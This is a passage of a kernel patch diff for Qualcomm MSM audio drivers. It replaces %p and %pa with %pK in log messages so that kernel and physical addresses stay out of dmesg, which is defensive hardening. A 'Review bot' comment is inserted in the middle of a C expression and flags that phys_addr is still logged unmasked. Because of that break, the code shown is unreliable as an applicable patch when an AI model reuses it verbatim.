- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -292,7 +292,7 @@ static int reg_ion_mem(void) - &po.kvaddr); - if (rc != 0) - pr_err("%s: failed to allocate memory.\n", __func__); -- pr_debug("%s: exited ion_client = %p, ion_handle = %p, phys_addr = %lu, length = %d, vaddr = %p, rc = 0x%x\n", -+ pr_debug("%s: exited ion_client = %pK, ion_handle = %pK, phys_addr = %lu, length = %d, vaddr = %pK, rc = 0x%x\n", - __func__, ion_client, ion_handle, (long)po.paddr, - (unsigned int)po.size, po.kvaddr, rc); - return rc; -diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c -index 79b92f6..32a16bf 100644 ---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c -+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c -@@ -1,5 +1,5 @@ - /* -- * Copyright (c) 2013-2015, Linux Foundation. All rights reserved. -+ * Copyright (c) 2013-2016, Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -95,7 +95,7 @@ static int msm_lsm_queue_lab_buffer(struct lsm_priv *prtd, int i) - struct snd_soc_pcm_runtime *rtd; - - if (!prtd || !prtd->lsm_client) { -- pr_err("%s: Invalid params prtd %p lsm client %p\n", -+ pr_err("%s: Invalid params prtd %pK lsm client %pK\n", - __func__, prtd, ((!prtd) ? 
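Review bot: The reg_ion_mem message masks `ion_client`, `ion_handle` and `vaddr` with `%pK` but still prints `phys_addr = %lu` from `(long)po.paddr`, so the value labelled as the physical address reaches the log unmasked on the same line. If the aim of the change is to keep kernel addresses out of dmesg, that field should go as well: `pr_debug("%s: exited ion_client = %pK, ion_handle = %pK, length = %d, vaddr = %pK, rc = 0x%x\n", __func__, ion_client, ion_handle, (unsigned int)po.size, po.kvaddr, rc);`. The existing `(long)` cast under `%lu` is also a signedness mismatch. The function body starts outside the hunk.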
NULL : prtd->lsm_client)); - return -EINVAL; - } -@@ -109,7 +109,7 @@ static int msm_lsm_queue_lab_buffer(struct lsm_priv *prtd, int i) - if (!prtd->lsm_client->lab_buffer || - i >= prtd->lsm_client->hw_params.period_count) { - dev_err(rtd->dev, -- "%s: Lab buffer not setup %p incorrect index %d period count %d\n", -+ "%s: Lab buffer not setup %pK incorrect index %d period count %d\n", - __func__, prtd->lsm_client->lab_buffer, i, - prtd->lsm_client->hw_params.period_count); - return -EINVAL; -@@ -136,7 +136,7 @@ static int lsm_lab_buffer_sanity(struct lsm_priv *prtd, - struct snd_soc_pcm_runtime *rtd; - - if (!prtd || !read_done || !index) { -- pr_err("%s: Invalid params prtd %p read_done %p index %p\n", -+ pr_err("%s: Invalid params prtd %pK read_done %pK index %pK\n", - __func__, prtd, read_done, index); - return -EINVAL; - } -@@ -150,7 +150,7 @@ static int lsm_lab_buffer_sanity(struct lsm_priv *prtd, - - if (!prtd->lsm_client->lab_enable || !prtd->lsm_client->lab_buffer) { - dev_err(rtd->dev, -- "%s: Lab not enabled %d invalid lab buffer %p\n", -+ "%s: Lab not enabled %d invalid lab buffer %pK\n", - __func__, prtd->lsm_client->lab_enable, - prtd->lsm_client->lab_buffer); - return -EINVAL; -@@ -164,7 +164,7 @@ static int lsm_lab_buffer_sanity(struct lsm_priv *prtd, - (prtd->lsm_client->lab_buffer[i].mem_map_handle == - read_done->mem_map_handle)) { - dev_dbg(rtd->dev, -- "%s: Buffer found %pa memmap handle %d\n", -+ "%s: Buffer found %pK memmap handle %d\n", - __func__, &prtd->lsm_client->lab_buffer[i].phys, - prtd->lsm_client->lab_buffer[i].mem_map_handle); - if (read_done->total_size > -@@ -211,7 +211,7 @@ static void lsm_event_handler(uint32_t opcode, uint32_t token, - if (prtd->lsm_client->session != token || - !read_done) { - dev_err(rtd->dev, -- "%s: EVENT_READ_DONE invalid callback, session %d callback %d payload %p", -+ "%s: EVENT_READ_DONE invalid callback, session %d callback %d payload %pK", - __func__, prtd->lsm_client->session, - token, read_done); - 
return; -@@ -310,7 +310,7 @@ static int msm_lsm_lab_buffer_alloc(struct lsm_priv *lsm, int alloc) - int ret = 0; - struct snd_dma_buffer *dma_buf = NULL; - if (!lsm) { -- pr_err("%s: Invalid param lsm %p\n", __func__, lsm); -+ pr_err("%s: Invalid param lsm %pK\n", __func__, lsm); - return -EINVAL; - } - if (alloc) { -@@ -778,7 +778,7 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream, - snd_model_v2.data, snd_model_v2.data_size)) { - dev_err(rtd->dev, - "%s: copy from user data failed\n" -- "data %p size %d\n", __func__, -+ "data %pK size %d\n", __func__, - snd_model_v2.data, snd_model_v2.data_size); - q6lsm_snd_model_buf_free(prtd->lsm_client); - rc = -EFAULT; -@@ -1798,7 +1798,7 @@ static int msm_lsm_hw_params(struct snd_pcm_substream *substream, - - if (!prtd || !params) { - dev_err(rtd->dev, -- "%s: invalid params prtd %p params %p", -+ "%s: invalid params prtd %pK params %pK", - __func__, prtd, params); - return -EINVAL; - } -@@ -1840,7 +1840,7 @@ static snd_pcm_uframes_t msm_lsm_pcm_pointer( - - if (!prtd) { - dev_err(rtd->dev, -- "%s: Invalid param %p\n", __func__, prtd); -+ "%s: Invalid param %pK\n", __func__, prtd); - return 0; - } - -@@ -1868,7 +1868,7 @@ static int msm_lsm_pcm_copy(struct snd_pcm_substream *substream, int ch, - - if (!prtd) { - dev_err(rtd->dev, -- "%s: Invalid param %p\n", __func__, prtd); -+ "%s: Invalid param %pK\n", __func__, prtd); - return -EINVAL; - } - -diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c -index 84c21f4a1..f1c96ef 100644 ---- a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -387,7 +387,7 @@ static int msm_afe_open(struct snd_pcm_substream *substream) - pr_err("Failed to allocate memory for msm_audio\n"); - return -ENOMEM; - } else -- pr_debug("prtd %p\n", prtd); -+ pr_debug("prtd %pK\n", prtd); - - mutex_init(&prtd->lock); - spin_lock_init(&prtd->dsp_lock); -@@ -606,7 +606,7 @@ static int msm_afe_hw_params(struct snd_pcm_substream *substream, - return -ENOMEM; - } - -- pr_debug("%s:buf = %p\n", __func__, buf); -+ pr_debug("%s:buf = %pK\n", __func__, buf); - dma_buf->dev.type = SNDRV_DMA_TYPE_DEV; - dma_buf->dev.dev = substream->pcm->card->dev; - dma_buf->private_data = NULL; -diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-host-voice-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-host-voice-v2.c -index c190977..1dd18c6 100644 ---- a/sound/soc/msm/qdsp6v2/msm-pcm-host-voice-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-pcm-host-voice-v2.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2013-2014, 2016 The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -504,7 +504,7 @@ static int hpcm_allocate_shared_memory(struct hpcm_drv *prtd) - - sess->tp_mem_table.size = sizeof(struct vss_imemory_table_t); - -- pr_debug("%s: data %p phys %pa\n", __func__, -+ pr_debug("%s: data %pK phys %pK\n", __func__, - sess->tp_mem_table.data, &sess->tp_mem_table.phys); - - /* Split 4096 block into four 1024 byte blocks for each dai */ -@@ -682,7 +682,7 @@ void hpcm_notify_evt_processing(uint8_t *data, char *session, - } - - if (tp == NULL || tmd == NULL) { -- pr_err("%s: tp = %p or tmd = %p is null\n", __func__, -+ pr_err("%s: tp = %pK or tmd = %pK is null\n", __func__, - tp, tmd); - - return; -diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c -index 64d3fe0..ad7e114 100644 ---- a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2014, 2016 The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -132,7 +132,7 @@ static void event_handler(uint32_t opcode, - pr_debug("%s:writing %d bytes of buffer[%d] to dsp 2\n", - __func__, prtd->pcm_count, prtd->out_head); - temp = buf[0].phys + (prtd->out_head * prtd->pcm_count); -- pr_debug("%s:writing buffer[%d] from 0x%pa\n", -+ pr_debug("%s:writing buffer[%d] from 0x%pK\n", - __func__, prtd->out_head, &temp); - if (prtd->meta_data_mode) { - memcpy(&output_meta_data, (char *)(buf->data + -@@ -623,7 +623,7 @@ static int msm_pcm_hw_params(struct snd_pcm_substream *substream, - if (buf == NULL || buf[0].data == NULL) - return -ENOMEM; - -- pr_debug("%s:buf = %p\n", __func__, buf); -+ pr_debug("%s:buf = %pK\n", __func__, buf); - dma_buf->dev.type = SNDRV_DMA_TYPE_DEV; - dma_buf->dev.dev = substream->pcm->card->dev; - dma_buf->private_data = NULL; -diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c -index 4eb3f2a..37461db 100644 ---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c -+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -746,7 +746,7 @@ static int msm_pcm_capture_copy(struct snd_pcm_substream *substream, - pr_debug("%s: pcm stopped in_count 0\n", __func__); - return 0; - } -- pr_debug("Checking if valid buffer is available...%p\n", -+ pr_debug("Checking if valid buffer is available...%pK\n", - data); - data = q6asm_is_cpu_buf_avail(OUT, prtd->audio_client, &size, &idx); - bufptr = data; -@@ -903,7 +903,7 @@ static int msm_pcm_hw_params(struct snd_pcm_substream *substream, - if (buf == NULL || buf[0].data == NULL) - return -ENOMEM; - -- pr_debug("%s:buf = %p\n", __func__, buf); -+ pr_debug("%s:buf = %pK\n", __func__, buf); - dma_buf->dev.type = SNDRV_DMA_TYPE_DEV; - dma_buf->dev.dev = substream->pcm->card->dev; - dma_buf->private_data = NULL; -diff --git a/sound/soc/msm/qdsp6v2/q6adm.c b/sound/soc/msm/qdsp6v2/q6adm.c -index 5d0fd0d..f029594 100644 ---- a/sound/soc/msm/qdsp6v2/q6adm.c -+++ b/sound/soc/msm/qdsp6v2/q6adm.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -378,7 +378,7 @@ int adm_dts_eagle_get(int port_id, int copp_idx, int param_id, - } - - if ((size == 0) || !data) { -- pr_err("DTS_EAGLE_ADM: %s - invalid size %u or pointer %p.\n", -+ pr_err("DTS_EAGLE_ADM: %s - invalid size %u or pointer %pK.\n", - __func__, size, data); - return -EINVAL; - } -@@ -1246,7 +1246,7 @@ static int32_t adm_callback(struct apr_client_data *data, void *priv) - payload = data->payload; - - if (data->opcode == RESET_EVENTS) { -- pr_debug("%s: Reset event is received: %d %d apr[%p]\n", -+ pr_debug("%s: Reset event is received: %d %d apr[%pK]\n", - __func__, - data->reset_event, data->reset_proc, this_adm.apr); - if (this_adm.apr) { -@@ -1739,7 +1739,7 @@ static void remap_cal_data(struct cal_block_data *cal_block, int cal_index) - pr_err("%s: ADM mmap did not work! size = %zd ret %d\n", - __func__, - cal_block->map_data.map_size, ret); -- pr_debug("%s: ADM mmap did not work! addr = 0x%pa, size = %zd ret %d\n", -+ pr_debug("%s: ADM mmap did not work! 
addr = 0x%pK, size = %zd ret %d\n", - __func__, - &cal_block->cal_data.paddr, - cal_block->map_data.map_size, ret); -@@ -1802,7 +1802,7 @@ static void send_adm_custom_topology(void) - - atomic_set(&this_adm.adm_stat, 0); - atomic_set(&this_adm.adm_cmd_err_code, 0); -- pr_debug("%s: Sending ADM_CMD_ADD_TOPOLOGIES payload = 0x%pa, size = %d\n", -+ pr_debug("%s: Sending ADM_CMD_ADD_TOPOLOGIES payload = 0x%pK, size = %d\n", - __func__, &cal_block->cal_data.paddr, - adm_top.payload_size); - result = apr_send_pkt(this_adm.apr, (uint32_t *)&adm_top); -@@ -1892,14 +1892,14 @@ static int send_adm_cal_block(int port_id, int copp_idx, - - atomic_set(&this_adm.copp.stat[port_idx][copp_idx], 0); - atomic_set(&this_adm.copp.cmd_err_code[port_idx][copp_idx], 0); -- pr_debug("%s: Sending SET_PARAMS payload = 0x%pa, size = %d\n", -+ pr_debug("%s: Sending SET_PARAMS payload = 0x%pK, size = %d\n", - __func__, &cal_block->cal_data.paddr, - adm_params.payload_size); - result = apr_send_pkt(this_adm.apr, (uint32_t *)&adm_params); - if (result < 0) { - pr_err("%s: Set params failed port 0x%x result %d\n", - __func__, port_id, result); -- pr_debug("%s: Set params failed port = 0x%x payload = 0x%pa result %d\n", -+ pr_debug("%s: Set params failed port = 0x%x payload = 0x%pK result %d\n", - __func__, port_id, &cal_block->cal_data.paddr, result); - result = -EINVAL; - goto done; -@@ -1911,7 +1911,7 @@ static int send_adm_cal_block(int port_id, int copp_idx, - if (!result) { - pr_err("%s: Set params timed out port = 0x%x\n", - __func__, port_id); -- pr_debug("%s: Set params timed out port = 0x%x, payload = 0x%pa\n", -+ pr_debug("%s: Set params timed out port = 0x%x, payload = 0x%pK\n", - __func__, port_id, &cal_block->cal_data.paddr); - result = -EINVAL; - goto done; -@@ -2352,7 +2352,7 @@ int adm_open(int port_id, int path, int rate, int channel_mode, int topology, - res = adm_memory_map_regions(&this_adm.outband_memmap.paddr, 0, - (uint32_t *)&this_adm.outband_memmap.size, 1); - if (res < 
0) { -- pr_err("%s: SRS adm_memory_map_regions failed ! addr = 0x%p, size = %d\n", -+ pr_err("%s: SRS adm_memory_map_regions failed ! addr = 0x%pK, size = %d\n", - __func__, (void *)this_adm.outband_memmap.paddr, - (uint32_t)this_adm.outband_memmap.size); - } -@@ -2781,7 +2781,7 @@ int adm_map_rtac_block(struct rtac_cal_block_data *cal_block) - pr_err("%s: RTAC mmap did not work! size = %d result %d\n", - __func__, - cal_block->map_data.map_size, result); -- pr_debug("%s: RTAC mmap did not work! addr = 0x%pa, size = %d\n", -+ pr_debug("%s: RTAC mmap did not work! addr = 0x%pK, size = %d\n", - __func__, - &cal_block->cal_data.paddr, - cal_block->map_data.map_size); -@@ -3963,7 +3963,7 @@ static int adm_source_tracking_alloc_map_memory(void) - (uint32_t *)&this_adm.sourceTrackingData.memmap.size, - 1); - if (ret < 0) { -- pr_err("%s: failed to map memory, paddr = 0x%p, size = %d\n", -+ pr_err("%s: failed to map memory, paddr = 0x%pK, size = %d\n", - __func__, - (void *)this_adm.sourceTrackingData.memmap.paddr, - (uint32_t)this_adm.sourceTrackingData.memmap.size); -@@ -3983,7 +3983,7 @@ static int adm_source_tracking_alloc_map_memory(void) - goto done; - } - ret = 0; -- pr_debug("%s: paddr = 0x%p, size = %d, mem_map_handle = 0x%x\n", -+ pr_debug("%s: paddr = 0x%pK, size = %d, mem_map_handle = 0x%x\n", - __func__, (void *)this_adm.sourceTrackingData.memmap.paddr, - (uint32_t)this_adm.sourceTrackingData.memmap.size, - atomic_read(&this_adm.mem_map_handles -diff --git a/sound/soc/msm/qdsp6v2/q6afe.c b/sound/soc/msm/qdsp6v2/q6afe.c -index 860aab8..e5c7347 100644 ---- a/sound/soc/msm/qdsp6v2/q6afe.c -+++ b/sound/soc/msm/qdsp6v2/q6afe.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -167,7 +167,7 @@ static int32_t afe_callback(struct apr_client_data *data, void *priv) - return -EINVAL; - } - if (data->opcode == RESET_EVENTS) { -- pr_debug("%s: reset event = %d %d apr[%p]\n", -+ pr_debug("%s: reset event = %d %d apr[%pK]\n", - __func__, - data->reset_event, data->reset_proc, this_afe.apr); - -@@ -202,7 +202,7 @@ static int32_t afe_callback(struct apr_client_data *data, void *priv) - - if ((data->payload_size < sizeof(this_afe.calib_data)) - || !payload || (data->token >= AFE_MAX_PORTS)) { -- pr_err("%s: Error: size %d payload %p token %d\n", -+ pr_err("%s: Error: size %d payload %pK token %d\n", - __func__, data->payload_size, - payload, data->token); - return -EINVAL; -@@ -541,7 +541,7 @@ static int afe_send_cal_block(u16 port_id, struct cal_block_data *cal_block) - populate_upper_32_bits(cal_block->cal_data.paddr); - afe_cal.param.mem_map_handle = cal_block->map_data.q6map_handle; - -- pr_debug("%s: AFE cal sent for device port = 0x%x, cal size = %zd, cal addr = 0x%pa\n", -+ pr_debug("%s: AFE cal sent for device port = 0x%x, cal size = %zd, cal addr = 0x%pK\n", - __func__, port_id, - cal_block->cal_data.size, &cal_block->cal_data.paddr); - -@@ -586,7 +586,7 @@ static int afe_send_custom_topology_block(struct cal_block_data *cal_block) - populate_upper_32_bits(cal_block->cal_data.paddr); - afe_cal.mem_map_handle = cal_block->map_data.q6map_handle; - -- pr_debug("%s:cmd_id:0x%x calsize:%zd memmap_hdl:0x%x caladdr:0x%pa", -+ pr_debug("%s:cmd_id:0x%x calsize:%zd memmap_hdl:0x%x caladdr:0x%pK", - __func__, AFE_CMD_ADD_TOPOLOGIES, cal_block->cal_data.size, - afe_cal.mem_map_handle, &cal_block->cal_data.paddr); - -@@ -1090,7 +1090,7 @@ static void remap_cal_data(struct cal_block_data *cal_block, int cal_index) - pr_err("%s: mmap did not work! 
size = %zd ret %d\n", - __func__, - cal_block->map_data.map_size, ret); -- pr_debug("%s: mmap did not work! addr = 0x%pa, size = %zd\n", -+ pr_debug("%s: mmap did not work! addr = 0x%pK, size = %zd\n", - __func__, - &cal_block->cal_data.paddr, - cal_block->map_data.map_size); -@@ -2843,7 +2843,7 @@ int q6afe_audio_client_buf_alloc_contiguous(unsigned int dir, - size_t len; - - if (!(ac) || ((dir != IN) && (dir != OUT))) { -- pr_err("%s: ac %p dir %d\n", __func__, ac, dir); -+ pr_err("%s: ac %pK dir %d\n", __func__, ac, dir); - return -EINVAL; - } - -@@ -2895,7 +2895,7 @@ int q6afe_audio_client_buf_alloc_contiguous(unsigned int dir, - buf[cnt].used = dir ^ 1; - buf[cnt].size = bufsz; - buf[cnt].actual_size = bufsz; -- pr_debug("%s: data[%p]phys[%pa][%p]\n", __func__, -+ pr_debug("%s: data[%pK]phys[%pK][%pK]\n", __func__, - buf[cnt].data, - &buf[cnt].phys, - &buf[cnt].phys); -@@ -2992,7 +2992,7 @@ int afe_cmd_memory_map(phys_addr_t dma_addr_p, u32 dma_buf_sz) - mregion_pl->shm_addr_msw = populate_upper_32_bits(dma_addr_p); - mregion_pl->mem_size_bytes = dma_buf_sz; - -- pr_debug("%s: dma_addr_p 0x%pa , size %d\n", __func__, -+ pr_debug("%s: dma_addr_p 0x%pK , size %d\n", __func__, - &dma_addr_p, dma_buf_sz); - atomic_set(&this_afe.state, 1); - atomic_set(&this_afe.status, 0); -@@ -3116,7 +3116,7 @@ int q6afe_audio_client_buf_free_contiguous(unsigned int dir, - cnt = port->max_buf_cnt - 1; - - if (port->buf[0].data) { -- pr_debug("%s: data[%p]phys[%pa][%p] , client[%p] handle[%p]\n", -+ pr_debug("%s: data[%pK]phys[%pK][%pK] , client[%pK] handle[%pK]\n", - __func__, - port->buf[0].data, - &port->buf[0].phys, -@@ -3371,7 +3371,7 @@ int afe_rt_proxy_port_write(phys_addr_t buf_addr_p, - ret = -ENODEV; - return ret; - } -- pr_debug("%s: buf_addr_p = 0x%pa bytes = %d\n", __func__, -+ pr_debug("%s: buf_addr_p = 0x%pK bytes = %d\n", __func__, - &buf_addr_p, bytes); - - afecmd_wr.hdr.hdr_field = APR_HDR_FIELD(APR_MSG_TYPE_SEQ_CMD, -@@ -3407,7 +3407,7 @@ int 
afe_rt_proxy_port_read(phys_addr_t buf_addr_p, - ret = -ENODEV; - return ret; - } -- pr_debug("%s: buf_addr_p = 0x%pa bytes = %d\n", __func__, -+ pr_debug("%s: buf_addr_p = 0x%pK bytes = %d\n", __func__, - &buf_addr_p, bytes); - - afecmd_rd.hdr.hdr_field = APR_HDR_FIELD(APR_MSG_TYPE_SEQ_CMD, -@@ -4757,7 +4757,7 @@ static int afe_map_cal_data(int32_t cal_type, - pr_err("%s: mmap did not work! size = %zd ret %d\n", - __func__, - cal_block->map_data.map_size, ret); -- pr_debug("%s: mmap did not work! addr = 0x%pa, size = %zd\n", -+ pr_debug("%s: mmap did not work! addr = 0x%pK, size = %zd\n", - __func__, - &cal_block->cal_data.paddr, - cal_block->map_data.map_size); -@@ -4904,7 +4904,7 @@ int afe_map_rtac_block(struct rtac_cal_block_data *cal_block) - result = afe_cmd_memory_map(cal_block->cal_data.paddr, - cal_block->map_data.map_size); - if (result < 0) { -- pr_err("%s: afe_cmd_memory_map failed for addr = 0x%pa, size = %d, err %d\n", -+ pr_err("%s: afe_cmd_memory_map failed for addr = 0x%pK, size = %d, err %d\n", - __func__, &cal_block->cal_data.paddr, - cal_block->map_data.map_size, result); - return result; -diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c -index 1c6e938..ab34ac1 100644 ---- a/sound/soc/msm/qdsp6v2/q6asm.c -+++ b/sound/soc/msm/qdsp6v2/q6asm.c -@@ -481,7 +481,7 @@ static int q6asm_map_cal_memory(struct cal_block_data *cal_block) - pr_err("%s: mmap did not work! size = %zd result %d\n", - __func__, - cal_block->map_data.map_size, result); -- pr_debug("%s: mmap did not work! addr = 0x%pa, size = %zd\n", -+ pr_debug("%s: mmap did not work! 
addr = 0x%pK, size = %zd\n", - __func__, - &cal_block->cal_data.paddr, - cal_block->map_data.map_size); -@@ -613,7 +613,7 @@ int send_asm_custom_topology(struct audio_client *ac) - asm_top.mem_map_handle = cal_block->map_data.q6map_handle; - asm_top.payload_size = cal_block->cal_data.size; - -- pr_debug("%s: Sending ASM_CMD_ADD_TOPOLOGIES payload = %pa, size = %d, map handle = 0x%x\n", -+ pr_debug("%s: Sending ASM_CMD_ADD_TOPOLOGIES payload = %pK, size = %d, map handle = 0x%x\n", - __func__, &cal_block->cal_data.paddr, - asm_top.payload_size, asm_top.mem_map_handle); - -@@ -621,7 +621,7 @@ int send_asm_custom_topology(struct audio_client *ac) - if (result < 0) { - pr_err("%s: Set topologies failed result %d\n", - __func__, result); -- pr_debug("%s: Set topologies failed payload = 0x%pa\n", -+ pr_debug("%s: Set topologies failed payload = 0x%pK\n", - __func__, &cal_block->cal_data.paddr); - goto unmap; - -@@ -631,7 +631,7 @@ int send_asm_custom_topology(struct audio_client *ac) - (atomic_read(&ac->mem_state) <= 0), 5*HZ); - if (!result) { - pr_err("%s: Set topologies failed timeout\n", __func__); -- pr_debug("%s: Set topologies failed after timedout payload = 0x%pa\n", -+ pr_debug("%s: Set topologies failed after timedout payload = 0x%pK\n", - __func__, &cal_block->cal_data.paddr); - result = -ETIMEDOUT; - goto unmap; -@@ -707,7 +707,7 @@ int q6asm_map_rtac_block(struct rtac_cal_block_data *cal_block) - pr_err("%s: mmap did not work! size = %d result %d\n", - __func__, - cal_block->map_data.map_size, result); -- pr_debug("%s: mmap did not work! addr = 0x%pa, size = %d\n", -+ pr_debug("%s: mmap did not work! 
addr = 0x%pK, size = %d\n", - __func__, - &cal_block->cal_data.paddr, - cal_block->map_data.map_size); -@@ -844,7 +844,7 @@ int q6asm_audio_client_buf_free_contiguous(unsigned int dir, - } - - if (port->buf[0].data) { -- pr_debug("%s: data[%p]phys[%pa][%p] , client[%p] handle[%p]\n", -+ pr_debug("%s: data[%pK]phys[%pK][%pK] , client[%pK] handle[%pK]\n", - __func__, - port->buf[0].data, - &port->buf[0].phys, -@@ -875,7 +875,7 @@ void q6asm_audio_client_free(struct audio_client *ac) - int loopcnt; - struct audio_port_data *port; - if (!ac) { -- pr_err("%s: ac %p\n", __func__, ac); -+ pr_err("%s: ac %pK\n", __func__, ac); - return; - } - if (!ac->session) { -@@ -1092,7 +1092,7 @@ int q6asm_audio_client_buf_alloc(unsigned int dir, - size_t len; - - if (!(ac) || ((dir != IN) && (dir != OUT))) { -- pr_err("%s: ac %p dir %d\n", __func__, ac, dir); -+ pr_err("%s: ac %pK dir %d\n", __func__, ac, dir); - return -EINVAL; - } - -@@ -1145,7 +1145,7 @@ int q6asm_audio_client_buf_alloc(unsigned int dir, - buf[cnt].used = 1; - buf[cnt].size = bufsz; - buf[cnt].actual_size = bufsz; -- pr_debug("%s: data[%p]phys[%pa][%p]\n", -+ pr_debug("%s: data[%pK]phys[%pK][%pK]\n", - __func__, - buf[cnt].data, - &buf[cnt].phys, -@@ -1182,7 +1182,7 @@ int q6asm_audio_client_buf_alloc_contiguous(unsigned int dir, - int bytes_to_alloc; - - if (!(ac) || ((dir != IN) && (dir != OUT))) { -- pr_err("%s: ac %p dir %d\n", __func__, ac, dir); -+ pr_err("%s: ac %pK dir %d\n", __func__, ac, dir); - return -EINVAL; - } - -@@ -1251,7 +1251,7 @@ int q6asm_audio_client_buf_alloc_contiguous(unsigned int dir, - buf[cnt].used = dir ^ 1; - buf[cnt].size = bufsz; - buf[cnt].actual_size = bufsz; -- pr_debug("%s: data[%p]phys[%pa][%p]\n", -+ pr_debug("%s: data[%pK]phys[%pK][%pK]\n", - __func__, - buf[cnt].data, - &buf[cnt].phys, -@@ -1294,7 +1294,7 @@ static int32_t q6asm_srvc_callback(struct apr_client_data *data, void *priv) - payload = data->payload; - - if (data->opcode == RESET_EVENTS) { -- pr_debug("%s: Reset 
event is received: %d %d apr[%p]\n", -+ pr_debug("%s: Reset event is received: %d %d apr[%pK]\n", - __func__, - data->reset_event, - data->reset_proc, -@@ -1462,7 +1462,7 @@ static int32_t q6asm_callback(struct apr_client_data *data, void *priv) - return -EINVAL; - } - if (!q6asm_is_valid_audio_client(ac)) { -- pr_err("%s: audio client pointer is invalid, ac = %p\n", -+ pr_err("%s: audio client pointer is invalid, ac = %pK\n", - __func__, ac); - return -EINVAL; - } -@@ -1488,7 +1488,7 @@ static int32_t q6asm_callback(struct apr_client_data *data, void *priv) - atomic_set(&ac->reset, 1); - if (ac->apr == NULL) - ac->apr = ac->apr2; -- pr_debug("%s: Reset event is received: %d %d apr[%p]\n", -+ pr_debug("%s: Reset event is received: %d %d apr[%pK]\n", - __func__, - data->reset_event, data->reset_proc, ac->apr); - if (ac->cb) -@@ -1631,7 +1631,7 @@ static int32_t q6asm_callback(struct apr_client_data *data, void *priv) - payload[0] || - populate_upper_32_bits(port->buf[data->token].phys) != - payload[1]) { -- pr_debug("%s: Expected addr %pa\n", -+ pr_debug("%s: Expected addr %pK\n", - __func__, &port->buf[data->token].phys); - pr_err("%s: rxedl[0x%x] rxedu [0x%x]\n", - __func__, payload[0], payload[1]); -@@ -1717,7 +1717,7 @@ static int32_t q6asm_callback(struct apr_client_data *data, void *priv) - payload[READDONE_IDX_BUFADD_LSW] || - populate_upper_32_bits(port->buf[token].phys) != - payload[READDONE_IDX_BUFADD_MSW]) { -- dev_vdbg(ac->dev, "%s: Expected addr %pa\n", -+ dev_vdbg(ac->dev, "%s: Expected addr %pK\n", - __func__, &port->buf[token].phys); - pr_err("%s: rxedl[0x%x] rxedu[0x%x]\n", - __func__, -@@ -1802,7 +1802,7 @@ void *q6asm_is_cpu_buf_avail(int dir, struct audio_client *ac, uint32_t *size, - struct audio_port_data *port; - - if (!ac || ((dir != IN) && (dir != OUT))) { -- pr_err("%s: ac %p dir %d\n", __func__, ac, dir); -+ pr_err("%s: ac %pK dir %d\n", __func__, ac, dir); - return NULL; - } - -@@ -1829,7 +1829,7 @@ void *q6asm_is_cpu_buf_avail(int dir, 
struct audio_client *ac, uint32_t *size, - *size = port->buf[idx].actual_size; - *index = port->cpu_buf; - data = port->buf[idx].data; -- dev_vdbg(ac->dev, "%s: session[%d]index[%d] data[%p]size[%d]\n", -+ dev_vdbg(ac->dev, "%s: session[%d]index[%d] data[%pK]size[%d]\n", - __func__, - ac->session, - port->cpu_buf, -@@ -1854,7 +1854,7 @@ void *q6asm_is_cpu_buf_avail_nolock(int dir, struct audio_client *ac, - struct audio_port_data *port; - - if (!ac || ((dir != IN) && (dir != OUT))) { -- pr_err("%s: ac %p dir %d\n", __func__, ac, dir); -+ pr_err("%s: ac %pK dir %d\n", __func__, ac, dir); - return NULL; - } - -@@ -1881,7 +1881,7 @@ void *q6asm_is_cpu_buf_avail_nolock(int dir, struct audio_client *ac, - *size = port->buf[idx].actual_size; - *index = port->cpu_buf; - data = port->buf[idx].data; -- dev_vdbg(ac->dev, "%s: session[%d]index[%d] data[%p]size[%d]\n", -+ dev_vdbg(ac->dev, "%s: 